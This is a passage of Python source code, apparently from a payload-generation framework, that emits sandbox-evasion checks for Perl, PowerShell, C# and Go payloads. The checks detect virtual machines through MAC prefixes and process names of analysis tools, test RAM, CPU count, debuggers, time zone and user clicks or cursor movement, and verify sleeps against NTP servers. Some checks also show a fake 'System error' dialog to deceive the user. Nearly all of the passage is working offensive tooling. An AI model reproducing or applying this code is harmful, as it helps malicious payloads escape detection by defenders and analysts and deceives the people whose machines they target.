pack("B384", "00100011", (0)x14);my $secondTransmit = pack("B384", "00100011", (0)x14);\n'404            check_code += '\t' * num_tabs_required + '$sock->send($NTPTransmit);$sock->recv($NTPTransmit, 384);my ($Ignore, $firstTime, $Ignore2)=unpack("B319 N B32",$NTPTransmit);$firstTime -= 2208988800;$sock->close;\n'405            check_code += '\t' * num_tabs_required + 'sleep ' + evasion_payload.required_options["SLEEP"][0] + ';\n'406            check_code += '\t' * num_tabs_required + 'my $newSock = IO::Socket::INET->new(Proto => "udp",PeerPort => 123,PeerAddr => "us.pool.ntp.org",Timeout => 4);\n'407            check_code += '\t' * num_tabs_required + '$newSock->send($secondTransmit);$newSock->recv($secondTransmit, 384);my ($Ignore, $secondTime, $Ignore2)=unpack("B319 N B32",$secondTransmit);$newSock->close;\n'408            check_code += '\t' * num_tabs_required + 'my $newSock = IO::Socket::INET->new(Proto => "udp",PeerPort => 123,PeerAddr => "us.pool.ntp.org",Timeout => 4);\n'409            check_code += '\t' * num_tabs_required + 'if ((($secondTime - 2208988800) - $firstTime) >= ' + evasion_payload.required_options["SLEEP"][0] + ') {\n'410            # Add a tab for this check411            num_tabs_required += 1412        # Return check information413        return check_code, num_tabs_required414    elif evasion_payload.language == 'powershell':415        if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":416            check_code += "if($env:computername -eq \"" + evasion_payload.required_options["HOSTNAME"][0].lower() + "\") {\n"417            num_tabs_required += 1418        if evasion_payload.required_options["UTCCHECK"][0].lower() != "false":419            standard_time_zone = evasion_helpers.randomString()420            daylight_time_zone = evasion_helpers.randomString()421            check_code += "$" + standard_time_zone + ' = [System.TimeZone]::CurrentTimeZone.StandardName\n'422            check_code += "$" + daylight_time_zone + ' = 
[System.TimeZone]::CurrentTimeZone.DaylightName\n'423            check_code += "if ($" + standard_time_zone + ' -ne "Coordinated Universal Time" -or $' + daylight_time_zone + ' -eq "Coordinated Universal Time") {\n'424            num_tabs_required += 1425        if evasion_payload.required_options["MINRAM"][0].lower() != "false":426            check_code += "if ((Get-Ciminstance Win32_OperatingSystem).TotalVisibleMemorySize/1048576 -gt 3) {\n"427            num_tabs_required += 1428        if evasion_payload.required_options["VIRTUALPROC"][0].lower() != "false":429            evidenceof_sandbox = evasion_helpers.randomString()430            sandbox_processes = evasion_helpers.randomString()431            running_processes = evasion_helpers.randomString()432            running_proc = evasion_helpers.randomString()433            sandbox_proc = evasion_helpers.randomString()434            check_code += '$' + evidenceof_sandbox + ' = New-Object System.Collections.ArrayList\n'435            check_code += '$' + sandbox_processes + ' = "vmsrvc", "tcpview", "wireshark","visual basic", "fiddler", "vmware", "vbox", "process explorer", "autoit", "vboxtray", "vmtools", "vmrawdsk", "vmusbmouse", "vmvss", "vmscsi", "vmxnet", "vmx_svga", "vmmemctl", "df5serv", "vboxservice", "vmhgfs"\n'436            check_code += '$' + running_processes + ' = Get-Process\n'437            check_code += 'ForEach ($' + running_proc + ' in $' + running_processes + ') {\n'438            check_code += '\tForEach ($' + sandbox_proc + ' in $' + sandbox_processes + ') {\n'439            check_code += '\t\tif ($' + running_proc + '.ProcessName | Select-String $' + sandbox_proc + ') {\n'440            check_code += '\t\t\tif ($' + evidenceof_sandbox + ' -NotContains $' + running_proc+ '.ProcessName) {\n'441            check_code += '\t\t\t\t[void]$' + evidenceof_sandbox + '.Add($' + running_proc + '.ProcessName)\n'442            check_code += '\t\t\t}\n'443            check_code += '\t\t}\n'444            
check_code += '\t}\n'445            check_code += '}\n'446            check_code += 'if ($' + evidenceof_sandbox + '.count -eq 0) {\n'447            num_tabs_required += 1448        if evasion_payload.required_options["MINBROWSERS"][0].lower() != "false":449            browser_count = evasion_helpers.randomString()450            browser_keys = evasion_helpers.randomString()451            browser_key = evasion_helpers.randomString()452            check_code += '$' + browser_count + ' = 0\n'453            check_code += '$' + browser_keys + " = 'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe', 'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe', 'SOFTWARE\Mozilla'\n"454            check_code += 'ForEach ($' + browser_key + ' in $' + browser_keys + ') {\n'455            check_code += '\tif (Test-Path ("HKLM:\" + $' + browser_key + ')) {\n'456            check_code += '\t\t++$' + browser_count + '\n'457            check_code += '\t}\n'458            check_code += '}\n'459            check_code += 'if ($' + browser_count + ' -ge 2) {\n'460            num_tabs_required += 1461        if evasion_payload.required_options["BADMACS"][0].lower() != "false":462            sand_macs = evasion_helpers.randomString()463            bad_macs = evasion_helpers.randomString()464            current_macs = evasion_helpers.randomString()465            mac_addy = evasion_helpers.randomString()466            badmac_addy = evasion_helpers.randomString()467            check_code += '$' + sand_macs + ' = New-Object System.Collections.ArrayList\n'468            check_code += '$' + bad_macs + " = '00:0C:29', '00:1C:14', '00:50:56', '00:05:69', '08:00:27'\n"469            check_code += '$' + current_macs + ' = Get-WmiObject Win32_NetworkAdapterConfiguration | Select -ExpandProperty MACAddress\n'470            check_code += 'ForEach ($' + mac_addy + ' in $' + current_macs + ') {\n'471            check_code += '\tForEach ($' + badmac_addy + ' in $' + bad_macs + ') 
{\n'472            check_code += '\t\tif ($' + mac_addy + ' | Select-String $' + badmac_addy + ') {\n'473            check_code += '\t\t\t[void]$' + sand_macs + '.Add($' + mac_addy + ')\n'474            check_code += '\t\t}\n'475            check_code += '\t}\n'476            check_code += '}\n'477            check_code += 'if ($' + sand_macs + '.count -eq 0) {\n'478            num_tabs_required += 1479        if evasion_payload.required_options["MINPROCESSES"][0].lower() != "x":480            minimum_processes = evasion_helpers.randomString()481            running_procs = evasion_helpers.randomString()482            check_code += '$' + minimum_processes + ' = ' + evasion_payload.required_options["MINPROCESSES"][0] + '\n'483            check_code += '$' + running_procs + ' = (Get-Process).count\n'484            check_code += 'if ($' + running_procs + ' -ge $' + minimum_processes + ') {\n'485            num_tabs_required += 1486        if evasion_payload.required_options["DOMAIN"][0].lower() != "x":487            check_code += "if((Get-WMIObject -Class Win32_ComputerSystem).Domain -eq \"" + evasion_payload.required_options["DOMAIN"][0].lower() + "\") {\n"488            num_tabs_required += 1489        if evasion_payload.required_options["USERNAME"][0].lower() != "x":490            check_code += "if($env:username -eq \"" + evasion_payload.required_options["USERNAME"][0].lower() + "\") {\n"491            num_tabs_required += 1492        if evasion_payload.required_options["PROCESSORS"][0].lower() != "x":493            check_code += "if((Get-WMIObject -Class Win32_Processor).NumberOfLogicalProcessors -ge " + evasion_payload.required_options["PROCESSORS"][0].lower() + ") {\n"494            num_tabs_required += 1495        if evasion_payload.required_options["SLEEP"][0].lower() != "x":496            check_code += "[Byte[]]$NTPTransmit=,1*48;$NTPTransmit[0]=0x1B;[Byte[]]$secondTransmit=,1*48;$secondTransmit[0]=0x1B;$noAccess=$false;"497            check_code += 
"Try{$Socket=New-Object Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Dgram,[Net.Sockets.ProtocolType]::Udp);$Socket.Connect('us.pool.ntp.org',123);[Void]$Socket.Send($NTPTransmit);[Void]$Socket.Receive($NTPTransmit)}catch{$noAccess=$true};"498            check_code += "$runTotal=0;ForEach($Index in $NTPTransmit[40..43]){$runTotal=$runTotal*256+$Index};$firstTime=(New-Object DateTime(1900,1,1,0,0,0,[DateTimeKind]::Utc)).AddMilliseconds([UInt64]($runTotal*1000)).Second;"499            check_code += "Start-Sleep -s " + evasion_payload.required_options["SLEEP"][0] + ";"500            check_code += "Try{$NewSock=New-Object Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Dgram,[Net.Sockets.ProtocolType]::Udp);$NewSock.Connect('us.pool.ntp.org',123);[Void]$NewSock.Send($secondTransmit);[Void]$NewSock.Receive($secondTransmit);$NewSock.Close()}catch{$noAccess=$true};"501            check_code += "$runTotal=0;ForEach($Index in $secondTransmit[40..43]){$runTotal=$runTotal*256+$Index}\n"502            check_code += "if ((New-Object DateTime(1900,1,1,0,0,0,[DateTimeKind]::Utc)).AddMilliseconds([UInt64]($runTotal*1000)).Second - $firstTime -ge " + evasion_payload.required_options["SLEEP"][0] + " -or $noAccess) {\n"503            num_tabs_required += 1504        if evasion_payload.required_options["USERPROMPT"][0].lower() != "false":505            dialog_title = evasion_helpers.randomString()506            dialog_text = evasion_helpers.randomString()507            message_box = evasion_helpers.randomString()508            check_code += '$' + dialog_title + ' = "System error encountered!"\n'509            check_code += '$' + dialog_text + ' = "Error 0x8163819f - Please hit OK to continue"\n'510            check_code += '$' + message_box + ' = New-Object -COMObject WScript.Shell\n'511            check_code += '[void]$' + message_box + '.Popup($' + dialog_text + ',0,$' + dialog_title + ',0)\n'512        
    check_code += 'if ($true) {\n'513            num_tabs_required += 1514        # Return check information515        return check_code, num_tabs_required516    elif evasion_payload.language == 'cs':517        if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":518            RandToday = evasion_helpers.randomString()519            RandExpire = evasion_helpers.randomString()520            # Create Payload code521            check_code += '\t' * num_tabs_required + 'DateTime {} = DateTime.Today;\n'.format(RandToday)522            check_code += '\t' * num_tabs_required + 'DateTime {} = {}.AddDays({});\n'.format(RandExpire, RandToday, evasion_payload.required_options["EXPIRE_PAYLOAD"][0])523            check_code += '\t' * num_tabs_required + 'if ({} < {}) {{\n'.format(RandExpire, RandToday)524            # Add a tab for this check525            num_tabs_required += 1526        if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":527            check_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(evasion_payload.required_options["HOSTNAME"][0].lower())528            # Add a tab for this check529            num_tabs_required += 1530        531        if evasion_payload.required_options["TIMEZONE"][0].lower() != 'x':532            check_code += '\t' * num_tabs_required + 'if (TimeZone.CurrentTimeZone.StandardName != "Coordinated Universal Time") {\n'533            # Add a tab for this check534            num_tabs_required += 1535        536        if evasion_payload.required_options["DEBUGGER"][0].lower() != 'x':537            check_code += '\t' * num_tabs_required + 'if (!System.Diagnostics.Debugger.IsAttached) {\n'538            # Add a tab for this check539            num_tabs_required += 1540        #if evasion_payload.required_options["BADMACS"][0].lower() != 'x':541        #    pass542        if evasion_payload.required_options["DOMAIN"][0].lower() != "x":543           
 check_code += '\t' * num_tabs_required + 'if (string.Equals("' + evasion_payload.required_options["DOMAIN"][0] + '", System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName, StringComparison.CurrentCultureIgnoreCase)) {\n'544            545            # Add a tab for this check546            num_tabs_required += 1547        if evasion_payload.required_options["PROCESSORS"][0].lower() != "x":548            check_code += '\t' * num_tabs_required + 'if (System.Environment.ProcessorCount >= {}) {{\n'.format(evasion_payload.required_options["PROCESSORS"][0])549            # Add a tab for this check550            num_tabs_required += 1551        if evasion_payload.required_options["USERNAME"][0].lower() != "x":552            rand_user_name = evasion_helpers.randomString()553            rand_char_name = evasion_helpers.randomString()554            check_code += '\t' * num_tabs_required + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(rand_user_name)555            check_code += '\t' * num_tabs_required + "string[] {} = {}.Split('\\\\');\n".format(rand_char_name, rand_user_name)556            check_code += '\t' * num_tabs_required + 'if ({}[1].Contains("{}")) {{\n\n'.format(rand_char_name, evasion_payload.required_options["USERNAME"][0])            557            # Add a tab for this check558            num_tabs_required += 1559        if evasion_payload.required_options["SLEEP"][0].lower() != "x":560            561            check_code += '\t' * num_tabs_required + 'var NTPTransmit = new byte[48];NTPTransmit[0] = 0x1B; var secondTransmit = new byte[48]; secondTransmit[0] = 0x1B;  var skip = false;\n'562            check_code += '\t' * num_tabs_required + 'var addr = Dns.GetHostEntry("us.pool.ntp.org").AddressList;var sock = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);\n'563            check_code += '\t' * num_tabs_required + 'try { sock.Connect(new IPEndPoint(addr[0], 123)); 
sock.ReceiveTimeout = 6000; sock.Send(NTPTransmit); sock.Receive(NTPTransmit); sock.Close(); } catch { skip = true; }\n'564            check_code += '\t' * num_tabs_required + 'ulong runTotal=0;for (int i=40; i<=43; ++i){runTotal = runTotal * 256 + (uint)NTPTransmit[i];}\n'565            check_code += '\t' * num_tabs_required + 'var t1 = (new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(1000 * runTotal);\n'566            check_code += '\t' * num_tabs_required + 'Thread.Sleep(' + evasion_payload.required_options["SLEEP"][0] + '*1000);\n'567            check_code += '\t' * num_tabs_required + 'var newSock = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);\n'568            check_code += '\t' * num_tabs_required + 'try { var addr2 = Dns.GetHostEntry("us.pool.ntp.org").AddressList; newSock.Connect(new IPEndPoint(addr2[0], 123)); newSock.ReceiveTimeout = 6000; newSock.Send(secondTransmit); newSock.Receive(secondTransmit); newSock.Close(); } catch { skip = true; }\n'569            check_code += '\t' * num_tabs_required + 'ulong secondTotal = 0; for (int i = 40; i <= 43; ++i) { secondTotal = secondTotal * 256 + (uint)secondTransmit[i]; }\n'570            check_code += '\t' * num_tabs_required + 'if (((new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(1000 * secondTotal) - t1).Seconds >= ' + evasion_payload.required_options["SLEEP"][0] + ' || skip) {\n'571            # Add a tab for this check572            num_tabs_required += 1573        # Return check information574        return check_code, num_tabs_required575    elif evasion_payload.language == 'go':576        rand_username = evasion_helpers.randomString()577        rand_error1 = evasion_helpers.randomString()578        rand_hostname = evasion_helpers.randomString()579        rand_error2 = evasion_helpers.randomString()580        rand_processor = evasion_helpers.randomString()581        rand_domain = evasion_helpers.randomString()582        if 
evasion_payload.required_options["USERNAME"][0].lower() != "x":583            check_code += rand_username + ", " + rand_error1 + " := user.Current()\n"584            check_code += "if " + rand_error1 + " != nil {\n"585            check_code += "os.Exit(1)}\n"586            check_code += "if strings.Contains(strings.ToLower(" + rand_username + ".Username), strings.ToLower(\"" + evasion_payload.required_options["USERNAME"][0] + "\")) {\n"587            num_tabs_required += 1588        if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":589            check_code += rand_hostname + ", " + rand_error2 + " := os.Hostname()\n"590            check_code += "if " + rand_error2 + " != nil {\n"591            check_code += "os.Exit(1)}\n"592            check_code += "if strings.Contains(strings.ToLower(" + rand_hostname + "), strings.ToLower(\"" + evasion_payload.required_options["HOSTNAME"][0] + "\")) {\n"593            num_tabs_required += 1594        if evasion_payload.required_options["PROCESSORS"][0].lower() != "x":595            check_code += rand_processor + " := runtime.NumCPU()\n"596            check_code += "if " + rand_processor + " >= " + evasion_payload.required_options["PROCESSORS"][0] + " {\n"597            num_tabs_required += 1598        if evasion_payload.required_options["SLEEP"][0].lower() != "x":599            check_code += 'type ntp_struct struct {FirstByte,A,B,C uint8;D,E,F uint32;G,H uint64;ReceiveTime uint64;J uint64}\n'600            check_code += 'sock,_ := net.Dial("udp", "us.pool.ntp.org:123");sock.SetDeadline(time.Now().Add((6*time.Second)));defer sock.Close()\n'601            check_code += 'ntp_transmit := new(ntp_struct);ntp_transmit.FirstByte=0x1b\n'602            check_code += 'binary.Write(sock, binary.BigEndian, ntp_transmit);binary.Read(sock, binary.BigEndian, ntp_transmit)\n'603            check_code += 'val := time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((ntp_transmit.ReceiveTime >> 32)*1000000000)))\n'604   
         check_code += 'time.Sleep(time.Duration(' + evasion_payload.required_options["SLEEP"][0] + '*1000) * time.Millisecond)\n'605            check_code += 'newsock,_ := net.Dial("udp", "us.pool.ntp.org:123");newsock.SetDeadline(time.Now().Add((6*time.Second)));defer newsock.Close()\n'606            check_code += 'second_transmit := new(ntp_struct);second_transmit.FirstByte=0x1b\n'607            check_code += 'binary.Write(newsock, binary.BigEndian, second_transmit);binary.Read(newsock, binary.BigEndian, second_transmit)\n'608            check_code += 'if int(time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((second_transmit.ReceiveTime >> 32)*1000000000))).Sub(val).Seconds()) >= ' + evasion_payload.required_options["SLEEP"][0] + ' {'609            num_tabs_required += 1610        611        if evasion_payload.required_options["UTCCHECK"][0].lower() != "false":612            613            tzone_abbrev = evasion_helpers.randomString()614            tzone_offset = evasion_helpers.randomString()615            616            check_code += '_, ' + tzone_offset + ' := time.Now().Zone()\n'617            check_code += 'if ' + tzone_offset + ' != 0 {\n'618            num_tabs_required += 1619        620        if evasion_payload.required_options["USERPROMPT"][0].lower() != "false":621            622            title_box = evasion_helpers.randomString()623            message_box = evasion_helpers.randomString()624            user32_dll = evasion_helpers.randomString()625            messagebox_w = evasion_helpers.randomString()626            check_code += 'var ' + title_box + ' = "System Error Encountered"\n'627            check_code += 'var ' + message_box + ' = "System error 0x831d83a4 - Press OK to continue"\n'628            check_code += 'var ' + user32_dll + ' = syscall.NewLazyDLL("user32.dll")\n'629            check_code += 'var ' + messagebox_w + ' = ' + user32_dll + '.NewProc("MessageBoxW")\n'630            check_code += messagebox_w + '.Call(0,\n'631 
           check_code += '\tuintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(' + message_box + '))),\n'632            check_code += '\tuintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(' + title_box + '))),\n'633            check_code += '0)\n'634            check_code += 'if true {\n'635            num_tabs_required += 1636        637        if evasion_payload.required_options["RAMCHECK"][0].lower() != 'false':638            639            memstatusx = evasion_helpers.randomString()640            kernel32_dll = evasion_helpers.randomString()641            globalmem_status = evasion_helpers.randomString()642            mem_info = evasion_helpers.randomString()643            check_code += 'type ' + memstatusx + ' struct {\n'644            check_code += '\tdwLength\tuint32\n'645            check_code += '\tdwMemoryLoad\tuint32\n'646            check_code += '\tullTotalPhys\tuint64\n'647            check_code += '\tullAvailPhys\tuint64\n'648            check_code += '\tullTotalPageFile\tuint64\n'649            check_code += '\tullAvailPageFile\tuint64\n'650            check_code += '\tullTotalVirtual\tuint64\n'651            check_code += '\tullAvailVirtual\tuint64\n'652            check_code += '\tullAvailExtendedVirtual\tuint64\n'653            check_code += '}\n'654            check_code += 'var ' + kernel32_dll + ' = syscall.NewLazyDLL("kernel32.dll")\n'655            check_code += 'var ' + globalmem_status + ' = ' + kernel32_dll + '.NewProc("GlobalMemoryStatusEx")\n'656            check_code += 'var ' + mem_info + ' ' + memstatusx + '\n'657            check_code += mem_info + '.dwLength = uint32(unsafe.Sizeof(' + mem_info + '))\n'658            check_code += globalmem_status + '.Call(uintptr(unsafe.Pointer(&' + mem_info + ')))\n'659            check_code += 'if (' + mem_info + '.ullTotalPhys/1073741824 >= 3) {\n'660            num_tabs_required += 1661        662        if evasion_payload.required_options["PROCCHECK"][0].lower() != 'false':663            664         
   kernel32 = evasion_helpers.randomString()665            createtoolhelp = evasion_helpers.randomString()666            proc32first = evasion_helpers.randomString()667            proc32next = evasion_helpers.randomString()668            closehandle = evasion_helpers.randomString()669            procentry32 = evasion_helpers.randomString()670            ev_of_sandbox = evasion_helpers.randomString()671            sbox_procs = evasion_helpers.randomString()672            hproc_snap = evasion_helpers.randomString()673            exe_names = evasion_helpers.randomString()674            pe32 = evasion_helpers.randomString()675            ret_val = evasion_helpers.randomString()676            exe = evasion_helpers.randomString()677            sbox_process = evasion_helpers.randomString()678            check_code += 'var ' + kernel32 + ' = syscall.NewLazyDLL("kernel32.dll")\n'679            check_code += 'var ' + createtoolhelp + ' = ' + kernel32 + '.NewProc("CreateToolhelp32Snapshot")\n'680            check_code += 'var ' + proc32first + ' = ' + kernel32 + '.NewProc("Process32FirstW")\n'681            check_code += 'var ' + proc32next + ' = ' + kernel32 + '.NewProc("Process32NextW")\n'682            check_code += 'var ' + closehandle + ' = ' + kernel32 + '.NewProc("CloseHandle")\n'683            check_code += 'type ' + procentry32 + ' struct {\n'684            check_code += '\tdwSize\t\tuint32\n'685            check_code += '\tcntUsage\t\tuint32\n'686            check_code += '\tth32ProcessID\t\tuint32\n'687            check_code += '\tth32DefaultHeapID\t\tuintptr\n'688            check_code += '\tth32ModuleID\t\tuint32\n'689            check_code += '\tcntThreads\t\tuint32\n'690            check_code += '\tth32ParentProcessID\t\tuint32\n'691            check_code += '\tpcPriClassBase\t\tint32\n'692            check_code += '\tdwFlags\t\tuint32\n'693            check_code += '\tszExeFile\t\t[260]uint16\n'694            check_code += '}\n'695            check_code += 
ev_of_sandbox + ' := make([]string, 0)\n'696            check_code += sbox_procs + " := [...]string{`vmsrvc`, `tcpview`, `wireshark`, `visual basic`, `fiddler`, `vmware`, `vbox`, `process explorer`, `autoit`, `vboxtray`, `vmtools`, `vmrawdsk`, `vmusbmouse`, `vmvss`, `vmscsi`, `vmxnet`, `vmx_svga`, `vmmemctl`, `df5serv`, `vboxservice`, `vmhgfs`}\n"697            check_code += hproc_snap + ', _, _ := ' + createtoolhelp + '.Call(2,0)\n'698            check_code += 'defer ' + closehandle + '.Call(' + hproc_snap + ')\n'699            check_code += exe_names + ' := make([]string, 0, 100)\n'700            check_code += 'var ' + pe32 + ' ' + procentry32 + '\n'701            check_code += pe32 + '.dwSize = uint32(unsafe.Sizeof(' + pe32 + '))\n'702            check_code += proc32first + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'703            check_code += 'for {\n'704            check_code += '\t' + exe_names + ' = append(' + exe_names + ', syscall.UTF16ToString(' + pe32 + '.szExeFile[:260]))\n'705            check_code += '\t' + ret_val + ', _, _ := ' + proc32next + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'706            check_code += '\tif ' + ret_val + ' == 0 {\n'707            check_code += '\t\tbreak\n'708            check_code += '\t}\n'709            check_code += '}\n'710            check_code += 'for _, ' + exe + ' := range ' + exe_names + ' {\n'711            check_code += '\tfor _, ' + sbox_process + ' := range ' + sbox_procs + ' {\n'712            check_code += '\t\tif (strings.Contains(strings.ToLower(' + exe + '), strings.ToLower(' + sbox_process + '))) {\n'713            check_code += '\t\t\t' + ev_of_sandbox + ' = append(' + ev_of_sandbox + ', ' + exe + ')\n'714            check_code += '\t\t}\n'715            check_code += '\t}\n'716            check_code += '}\n'717            check_code += 'if len(' + ev_of_sandbox + ') == 0 {\n'718            num_tabs_required += 1719        720        if 
evasion_payload.required_options["MINPROCS"][0].lower() != 'x':721            722            kernel32 = evasion_helpers.randomString()723            createtoolhelp = evasion_helpers.randomString()724            proc32first = evasion_helpers.randomString()725            proc32next = evasion_helpers.randomString()726            closehandle = evasion_helpers.randomString()727            min_processes = evasion_helpers.randomString()728            procentry32 = evasion_helpers.randomString()729            hproc_snap = evasion_helpers.randomString()730            exe_names = evasion_helpers.randomString()731            pe32 = evasion_helpers.randomString()732            ret_val = evasion_helpers.randomString()733            exe = evasion_helpers.randomString()734            count_running_procs = evasion_helpers.randomString()735            wut = evasion_helpers.randomString()736            check_code += 'var ' + kernel32 + ' = syscall.NewLazyDLL("kernel32.dll")\n'737            check_code += 'var ' + createtoolhelp + ' = ' + kernel32 + '.NewProc("CreateToolhelp32Snapshot")\n'738            check_code += 'var ' + proc32first + ' = ' + kernel32 + '.NewProc("Process32FirstW")\n'739            check_code += 'var ' + proc32next + ' = ' + kernel32 + '.NewProc("Process32NextW")\n'740            check_code += 'var ' + closehandle + ' = ' + kernel32 + '.NewProc("CloseHandle")\n'741            check_code += 'type ' + procentry32 + ' struct {\n'742            check_code += '\tdwSize\t\tuint32\n'743            check_code += '\tcntUsage\t\tuint32\n'744            check_code += '\tth32ProcessID\t\tuint32\n'745            check_code += '\tth32DefaultHeapID\t\tuintptr\n'746            check_code += '\tth32ModuleID\t\tuint32\n'747            check_code += '\tcntThreads\t\tuint32\n'748            check_code += '\tth32ParentProcessID\t\tuint32\n'749            check_code += '\tpcPriClassBase\t\tint32\n'750            check_code += '\tdwFlags\t\tuint32\n'751            check_code += 
'\tszExeFile\t\t[260]uint16\n'752            check_code += '}\n'753            check_code += min_processes + ' := ' + evasion_payload.required_options["MINPROCS"][0] + '\n'754            check_code += hproc_snap + ', _, _ := ' + createtoolhelp + '.Call(2,0)\n'755            check_code += 'defer ' + closehandle + '.Call(' + hproc_snap + ')\n'756            check_code += exe_names + ' := make([]string, 0, 100)\n'757            check_code += 'var ' + pe32 + ' ' + procentry32 + '\n'758            check_code += pe32 + '.dwSize = uint32(unsafe.Sizeof(' + pe32 + '))\n'759            check_code += proc32first + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'760            check_code += 'for {\n'761            check_code += '\t' + exe_names + ' = append(' + exe_names + ', syscall.UTF16ToString(' + pe32 + '.szExeFile[:260]))\n'762            check_code += '\t' + ret_val + ', _, _ := ' + proc32next + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'763            check_code += '\tif ' + ret_val + ' == 0 {\n'764            check_code += '\t\tbreak\n'765            check_code += '\t}\n'766            check_code += '}\n'767            check_code += count_running_procs + ' := 0\n'768            check_code += 'for _, ' + exe + ' := range ' + exe_names + ' {\n'769            check_code += "\tif " + exe + " == \"\" {\n"770            check_code += "\t\tos.Exit(1)}\n"771            check_code += '\t' + count_running_procs + ' += 1\n'772            check_code += '}\n'773            check_code += 'if (' + count_running_procs + ' >= ' + min_processes + ') {\n'774            num_tabs_required += 1775        776        if evasion_payload.required_options["BADMACS"][0].lower() != 'false':777            778            evd_sandbox = evasion_helpers.randomString()779            bad_addrs = evasion_helpers.randomString()780            nics = evasion_helpers.randomString()781            single_nic = evasion_helpers.randomString()782            bad_mac = 
evasion_helpers.randomString()783            check_code += evd_sandbox + ' := make([]net.HardwareAddr, 0)\n'784            check_code += bad_addrs + ' := [...]string{`00:0C:29`, `00:1C:14`, `00:50:56`, `00:05:69`, `08:00:27`}\n'785            check_code += nics + ', _ := net.Interfaces()\n'786            check_code += 'for _, ' + single_nic + ' := range ' + nics + ' {\n'787            check_code += '\tfor _, ' + bad_mac + ' := range ' + bad_addrs + ' {\n'788            check_code += '\t\tif strings.Contains(strings.ToLower(' + single_nic + '.HardwareAddr.String()), strings.ToLower(' + bad_mac + ')) {\n'789            check_code += '\t\t\t' + evd_sandbox + ' = append(' + evd_sandbox + ', ' + single_nic + '.HardwareAddr)\n'790            check_code += '\t\t}\n'791            check_code += '\t}\n'792            check_code += '}\n'793            check_code += 'if len(' + evd_sandbox + ') == 0 {\n'794            num_tabs_required += 1795        796        if evasion_payload.required_options["CLICKTRACK"][0].lower() != 'x':797            798            usr32 = evasion_helpers.randomString()799            getkey_state = evasion_helpers.randomString()800            counter = evasion_helpers.randomString()801            min_clicks = evasion_helpers.randomString()802            lft_click = evasion_helpers.randomString()803            rght_click = evasion_helpers.randomString()804            check_code += 'var ' + usr32 + ' = syscall.NewLazyDLL("user32.dll")\n'805            check_code += 'var ' + getkey_state + ' = ' + usr32 + '.NewProc("GetAsyncKeyState")\n'806            check_code += 'var ' + counter + ' = 0\n'807            check_code += 'var ' + min_clicks + ' = ' + evasion_payload.required_options["CLICKTRACK"][0] + '\n'808            check_code += 'for ' + counter + ' < ' + min_clicks + ' {\n'809            check_code += '\t' + lft_click + ', _, _ := ' + getkey_state + '.Call(uintptr(0x1))\n'810            check_code += '\t' + rght_click + ', _, _ := ' + getkey_state 
+ '.Call(uintptr(0x2))\n'811            check_code += '\tif ' + lft_click + ' % 2 == 1 {\n'812            check_code += '\t\t' + counter + ' += 1\n'813            check_code += '\t}\n'814            check_code += '\tif ' + rght_click + ' % 2 == 1 {\n'815            check_code += '\t\t' + counter + ' += 1\n'816            check_code += '\t}\n'817            check_code += '}\n'818            check_code += 'if true {\n'819            num_tabs_required += 1820        821        if evasion_payload.required_options["CURSORCHECK"][0].lower() != 'false':822            823            usr32 = evasion_helpers.randomString()824            cursor_position = evasion_helpers.randomString()825            point_struct = evasion_helpers.randomString()826            secs = evasion_helpers.randomString()827            point_var1 = evasion_helpers.randomString()828            point_var2 = evasion_helpers.randomString()829            check_code += 'type ' + point_struct + ' struct {\n'830            check_code += '\tx, y int32\n'831            check_code += '}\n'832            check_code += 'var ' + usr32 + ' = syscall.NewLazyDLL("user32.dll")\n'833            check_code += 'var ' + cursor_position + ' = ' + usr32 + '.NewProc("GetCursorPos")\n'834            check_code += secs + ' := 60\n'835            check_code += point_var1 + ' := ' + point_struct + '{}\n'836            check_code += cursor_position + '.Call(uintptr(unsafe.Pointer(&' + point_var1 + ')))\n'837            check_code += 'time.Sleep(time.Duration(' + secs + ' * 1000)  * time.Millisecond)\n'838            check_code += point_var2 + ' := ' + point_struct + '{}\n'839            check_code += cursor_position + '.Call(uintptr(unsafe.Pointer(&' + point_var2 + ')))\n'840            check_code += 'if ' + point_var1 + '.x - ' + point_var2 + '.x == 0 && ' + point_var1 + '.y - ' + point_var2 + '.y == 0 {\n'841            num_tabs_required += 1842        843        if evasion_payload.required_options["DISKSIZE"][0].lower() != 
